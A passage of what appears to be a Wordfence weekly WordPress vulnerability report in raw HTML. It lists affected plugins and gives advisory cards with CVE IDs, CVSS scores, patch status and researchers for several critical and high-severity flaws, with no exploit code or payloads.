			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chat-help" target="_blank" rel="noopener">chat-help</a>
		</td>
</tr>
<tr>
<td>Digits: WordPress Mobile Number Signup and Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/digits" target="_blank" rel="noopener">digits</a>
		</td>
</tr>
<tr>
<td>Download Monitor &#8211; WPForms Lock</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dlm-wpforms-lock" target="_blank" rel="noopener">dlm-wpforms-lock</a>
		</td>
</tr>
<tr>
<td>Easy Accordion – AI-Powered FAQ &amp; Accordion Blocks, Product FAQ</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-accordion-free" target="_blank" rel="noopener">easy-accordion-free</a>
		</td>
</tr>
<tr>
<td>Easy Appointments</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/easy-appointments" target="_blank" rel="noopener">easy-appointments</a>
		</td>
</tr>
<tr>
<td>ERP: Complete HR, Accounting &amp; CRM Suite Built for WooCommerce</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/erp" target="_blank" rel="noopener">erp</a>
		</td>
</tr>
<tr>
<td>Fense Proxy &amp; VPN Blocker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/fense-block-vpn-proxy" target="_blank" rel="noopener">fense-block-vpn-proxy</a>
		</td>
</tr>
<tr>
<td>FoodBook Lite – Online Food Ordering System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/foodbook-light-online-food-ordering-system" target="_blank" rel="noopener">foodbook-light-online-food-ordering-system</a>
		</td>
</tr>
<tr>
<td>Form Vibes – Save Contact Form 7 &amp; Elementor Form Entries to Database</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/form-vibes" target="_blank" rel="noopener">form-vibes</a>
		</td>
</tr>
<tr>
<td>GiveWP – Donation Plugin and Fundraising Platform</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give" target="_blank" rel="noopener">give</a>
		</td>
</tr>
<tr>
<td>Gravity Forms</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gravityforms" target="_blank" rel="noopener">gravityforms</a>
		</td>
</tr>
<tr>
<td>HubSpot All-In-One Marketing – Forms, Popups, Live Chat</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/leadin" target="_blank" rel="noopener">leadin</a>
		</td>
</tr>
<tr>
<td>Kali Forms — Contact Form &amp; Drag-and-Drop Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kali-forms" target="_blank" rel="noopener">kali-forms</a>
		</td>
</tr>
<tr>
<td>Kirki – Freeform Page Builder, Website Builder &amp; Customizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kirki" target="_blank" rel="noopener">kirki</a>
		</td>
</tr>
<tr>
<td>Landing Page Builder – Coming Soon page, Maintenance Mode, Lead Page, WordPress Landing Pages</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/page-builder-add" target="_blank" rel="noopener">page-builder-add</a>
		</td>
</tr>
<tr>
<td>LearnPress – WordPress LMS Plugin for Create and Sell Online Courses</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/learnpress" target="_blank" rel="noopener">learnpress</a>
		</td>
</tr>
<tr>
<td>List category posts</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/list-category-posts" target="_blank" rel="noopener">list-category-posts</a>
		</td>
</tr>
<tr>
<td>Loco Translate</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/loco-translate" target="_blank" rel="noopener">loco-translate</a>
		</td>
</tr>
<tr>
<td>MultiVendorX – WooCommerce Multivendor Marketplace AI Powered Solutions</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/dc-woocommerce-multi-vendor" target="_blank" rel="noopener">dc-woocommerce-multi-vendor</a>
		</td>
</tr>
<tr>
<td>MxChat – AI Chatbot &amp; Content Generation for WordPress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/mxchat-basic" target="_blank" rel="noopener">mxchat-basic</a>
		</td>
</tr>
<tr>
<td>News Kit Addons For Elementor</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/news-kit-elementor-addons" target="_blank" rel="noopener">news-kit-elementor-addons</a>
		</td>
</tr>
<tr>
<td>Ninja Forms &#8211; Excel Export</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ninja-forms-excel-export" target="_blank" rel="noopener">ninja-forms-excel-export</a>
		</td>
</tr>
<tr>
<td>Notifima – WooCommerce Stock Manager, Inventory Management, Waitlist</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-product-stock-alert" target="_blank" rel="noopener">woocommerce-product-stock-alert</a>
		</td>
</tr>
<tr>
<td>Online Scheduling and Appointment Booking System – Bookly</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bookly-responsive-appointment-booking-tool" target="_blank" rel="noopener">bookly-responsive-appointment-booking-tool</a>
		</td>
</tr>
<tr>
<td>Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile &amp; Restrict Content – ProfilePress</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-user-avatar" target="_blank" rel="noopener">wp-user-avatar</a>
		</td>
</tr>
<tr>
<td>pCloud WP Backup</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/pcloud-wp-backup" target="_blank" rel="noopener">pcloud-wp-backup</a>
		</td>
</tr>
<tr>
<td>Podlove Podcast Publisher</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/podlove-podcasting-plugin-for-wordpress" target="_blank" rel="noopener">podlove-podcasting-plugin-for-wordpress</a>
		</td>
</tr>
<tr>
<td>Premium Packages – Sell Digital Products Securely</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpdm-premium-packages" target="_blank" rel="noopener">wpdm-premium-packages</a>
		</td>
</tr>
<tr>
<td>Product Feed Manager For WooCommerce – Sell on 200+ Online Marketplaces</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/best-woocommerce-feed" target="_blank" rel="noopener">best-woocommerce-feed</a>
		</td>
</tr>
<tr>
<td>Quiz and Survey Master (QSM) – Quiz Maker &amp; Survey Maker</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/quiz-master-next" target="_blank" rel="noopener">quiz-master-next</a>
		</td>
</tr>
<tr>
<td>RPB Chessboard</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/rpb-chessboard" target="_blank" rel="noopener">rpb-chessboard</a>
		</td>
</tr>
<tr>
<td>SAML Single Sign On – SSO Login</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-saml-20-single-sign-on-2" target="_blank" rel="noopener">miniorange-saml-20-single-sign-on</a>
		</td>
</tr>
<tr>
<td>SEO Booster</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/seo-booster" target="_blank" rel="noopener">seo-booster</a>
		</td>
</tr>
<tr>
<td>Smart Custom Fields</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-custom-fields" target="_blank" rel="noopener">smart-custom-fields</a>
		</td>
</tr>
<tr>
<td>Smart Slider 3</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/smart-slider-3" target="_blank" rel="noopener">smart-slider-3</a>
		</td>
</tr>
<tr>
<td>Sprout Clients – CRM and Lead Management</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/sprout-clients" target="_blank" rel="noopener">sprout-clients</a>
		</td>
</tr>
<tr>
<td>SysBasics Customize My Account for WooCommerce – Live My Account Customizer</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/customize-my-account-for-woocommerce" target="_blank" rel="noopener">customize-my-account-for-woocommerce</a>
		</td>
</tr>
<tr>
<td>The Cache Purger</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/the-cache-purger" target="_blank" rel="noopener">the-cache-purger</a>
		</td>
</tr>
<tr>
<td>Themify Builder</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/themify-builder" target="_blank" rel="noopener">themify-builder</a>
		</td>
</tr>
<tr>
<td>Tickera – Sell Tickets &amp; Manage Events</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tickera-event-ticketing-system" target="_blank" rel="noopener">tickera-event-ticketing-system</a>
		</td>
</tr>
<tr>
<td>TrueBooker – Appointment Booking and Scheduler System</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">truebooker-appointment-booking</a>
		</td>
</tr>
<tr>
<td>Tutor LMS – eLearning and online course solution</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/tutor" target="_blank" rel="noopener">tutor</a>
		</td>
</tr>
<tr>
<td>Ultimate Auction Pro</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ultimate-woocommerce-auction-pro" target="_blank" rel="noopener">ultimate-woocommerce-auction-pro</a>
		</td>
</tr>
<tr>
<td>Uncanny Automator – Easy Automation, Integration, Webhooks &amp; Workflow Builder Plugin</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/uncanny-automator" target="_blank" rel="noopener">uncanny-automator</a>
		</td>
</tr>
<tr>
<td>W3SC Elementor to Zoho CRM</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/w3sc-elementor-to-zoho" target="_blank" rel="noopener">w3sc-elementor-to-zoho</a>
		</td>
</tr>
<tr>
<td>WooCommerce Placetopay Gateway</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay" target="_blank" rel="noopener">https://github.com/placetopay/woocommerce-gateway-placetopay</a>
		</td>
</tr>
<tr>
<td>WooCommerce Placetopay Gateway Belice</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay-belice" target="_blank" rel="noopener">woocommerce-gateway-placetopay-belice</a>
		</td>
</tr>
<tr>
<td>WooCommerce Placetopay Gateway Colombia</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay-colombia" target="_blank" rel="noopener">woocommerce-gateway-placetopay-colombia</a>
		</td>
</tr>
<tr>
<td>WooCommerce Placetopay Gateway Ecuador</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay-ecuador" target="_blank" rel="noopener">woocommerce-gateway-placetopay-ecuador</a>
		</td>
</tr>
<tr>
<td>WooCommerce Placetopay Gateway Honduras</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay-honduras" target="_blank" rel="noopener">woocommerce-gateway-placetopay-honduras</a>
		</td>
</tr>
<tr>
<td>WooCommerce Placetopay Gateway Uruguay</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/woocommerce-gateway-placetopay-uruguay" target="_blank" rel="noopener">woocommerce-gateway-placetopay-uruguay</a>
		</td>
</tr>
<tr>
<td>WP Bulk Delete</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-bulk-delete" target="_blank" rel="noopener">wp-bulk-delete</a>
		</td>
</tr>
<tr>
<td>WP Customer Area</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/customer-area" target="_blank" rel="noopener">customer-area</a>
		</td>
</tr>
<tr>
<td>WP Delicious – Recipe Plugin for Food Bloggers (formerly Delicious Recipes)</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/delicious-recipes" target="_blank" rel="noopener">delicious-recipes</a>
		</td>
</tr>
<tr>
<td>WP Hotel Booking</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-hotel-booking" target="_blank" rel="noopener">wp-hotel-booking</a>
		</td>
</tr>
<tr>
<td>WP TripAdvisor Review Slider</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-tripadvisor-review-slider" target="_blank" rel="noopener">wp-tripadvisor-review-slider</a>
		</td>
</tr>
<tr>
<td>WPBot – AI ChatBot for Live Support, Lead Generation, AI Services</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/chatbot" target="_blank" rel="noopener">chatbot</a>
		</td>
</tr>
<tr>
<td>wpForo Forum</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpforo" target="_blank" rel="noopener">wpforo</a>
		</td>
</tr>
<tr>
<td>WPFunnels – Funnel Builder for WooCommerce with Checkout &amp; One Click Upsell</td>
<td>
			<a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wpfunnels" target="_blank" rel="noopener">wpfunnels</a>
		</td>
</tr>
</table>
<hr>
<h3>Vulnerability Details</h3>
<p>Please note that if you run the Wordfence plugin on your WordPress site, with the scanner enabled, you should’ve already been notified if your site was affected by any of these vulnerabilities. If you’d like to receive real-time notifications whenever a vulnerability is added to the Wordfence Intelligence Vulnerability Database, <a href="https://www.wordfence.com/help/wordfence-intelligence-webhook-notifications/" target="_blank" rel="noopener">check out our Slack and HTTP Webhook Integration</a>, which is completely free to utilize.</p>
</p>
<div class="wfvr-vulnerabilities">
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53cc91fa-51fd-4d16-b740-a48f8d446b5d" target="_blank" rel="noopener">Aimogen Pro &#8211; All-in-One AI Content Writer, Editor, ChatBot &amp; Automation Toolkit &lt;= 2.8.4 &#8211; Unauthenticated Privilege Escalation via &#8216;aiomatic_call_google_ai_function&#8217;</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15982" target="_blank" rel="noopener noreferrer">							CVE-2026-15982						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 13, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/aimogen-pro-allinone-ai-content-writer-editor-chatbot-automation-toolkit" target="_blank" rel="noopener">Aimogen Pro &#8211; All-in-One AI Content Writer, Editor, ChatBot &amp; Automation Toolkit</a> <span class="wfvr-software-slug">[aimogen-pro]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/le-bao" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f53fb061b2b39c3b94e35c3f1ba9c31a.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f53fb061b2b39c3b94e35c3f1ba9c31a"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/le-bao" target="_blank" rel="noopener">Bao Le</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/53cc91fa-51fd-4d16-b740-a48f8d446b5d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d0538778-5ba4-4bec-a89d-ef90a9ba8375" target="_blank" rel="noopener">Bricksforge &lt;= 3.1.8.6 &#8211; Unauthenticated Privilege Escalation via Pro Forms fieldIds Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-14956" target="_blank" rel="noopener noreferrer">							CVE-2026-14956						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bricksforge" target="_blank" rel="noopener">Bricksforge</a> <span class="wfvr-software-slug">[bricksforge]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/2a1b4c1c638eb4f66b0677e71058a830.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="2a1b4c1c638eb4f66b0677e71058a830"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/0xd4rk5id3" target="_blank" rel="noopener">0xd4rk5id3</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/d0538778-5ba4-4bec-a89d-ef90a9ba8375" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f81a3429-f378-4295-adbe-ad6f1df59701" target="_blank" rel="noopener">Podlove Podcast Publisher &lt;= 4.5.1 &#8211; Unauthenticated Arbitrary File Upload via podlove_image_cache_url Parameter</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13001" target="_blank" rel="noopener noreferrer">							CVE-2026-13001						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/podlove-podcasting-plugin-for-wordpress" target="_blank" rel="noopener">Podlove Podcast Publisher</a> <span class="wfvr-software-slug">[podlove-podcasting-plugin-for-wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/51ac16594069727fd09950dd36cda805.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="51ac16594069727fd09950dd36cda805"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/talal-nasraddeen" target="_blank" rel="noopener">Talal Nasraddeen</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/f81a3429-f378-4295-adbe-ad6f1df59701" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee95092d-6351-4612-872d-284165bc1201" target="_blank" rel="noopener">SAML Single Sign On &lt;= 5.4.3 &#8211; Unauthenticated Authentication Bypass via &#8216;SAMLResponse&#8217; Parameter Signature Algorithm Confusion</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15013" target="_blank" rel="noopener noreferrer">							CVE-2026-15013						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/miniorange-saml-20-single-sign-on-2" target="_blank" rel="noopener">SAML Single Sign On – SSO Login</a> <span class="wfvr-software-slug">[miniorange-saml-20-single-sign-on]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/f8da36de0b16927a052e4eb0878abbfb.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="f8da36de0b16927a052e4eb0878abbfb"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/ly-hoang" target="_blank" rel="noopener">lhking</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/ee95092d-6351-4612-872d-284165bc1201" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/be8afa0c-af65-46d7-af07-de67353eddb5" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System &lt;= 1.2.3 &#8211; Unauthenticated Privilege Escalation</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-61951" target="_blank" rel="noopener noreferrer">							CVE-2026-61951						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking" target="_blank" rel="noopener">TrueBooker – Appointment Booking and Scheduler System</a> <span class="wfvr-software-slug">[truebooker-appointment-booking]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yangsori" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ff9bc9fb7771e161e54335c6af4fa582.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ff9bc9fb7771e161e54335c6af4fa582"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/yangsori" target="_blank" rel="noopener">yangsori</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/be8afa0c-af65-46d7-af07-de67353eddb5" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-critical">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ba55302-b38f-4932-bbba-cdd517380ad7" target="_blank" rel="noopener">WordPress Core 6.9 &#8211;  7.0.1 &#8211; Remote Code Execution via REST API Batch Request Route Confusion</a></h4>
<div class="cvss-score-badge">9.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>9.8 (Critical)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-63030" target="_blank" rel="noopener noreferrer">							CVE-2026-63030						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-core/" target="_blank" rel="noopener">WordPress</a> <span class="wfvr-software-slug">[wordpress]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-kues" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/00000000000000000000000000000000.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="00000000000000000000000000000000"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/adam-kues" target="_blank" rel="noopener">Adam Kues</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/1ba55302-b38f-4932-bbba-cdd517380ad7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02a283b2-a369-4927-a54a-61f26bee6ace" target="_blank" rel="noopener">Digits: WordPress Mobile Number Signup and Login &lt;= 9.1.0.5 &#8211; Authenticated (Subscriber+) Privilege Escalation via &#8216;digits_reg_userrole&#8217; Parameter</a></h4>
<div class="cvss-score-badge">8.8</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>8.8 (High)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-13741" target="_blank" rel="noopener noreferrer">							CVE-2026-13741						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Jul 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/digits" target="_blank" rel="noopener">Digits: WordPress Mobile Number Signup and Login</a> <span class="wfvr-software-slug">[digits]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e0f701652a71213d4d5afd11c6694ce0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e0f701652a71213d4d5afd11c6694ce0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/hoshino" target="_blank" rel="noopener">h0xilo</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/02a283b2-a369-4927-a54a-61f26bee6ace" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-high">
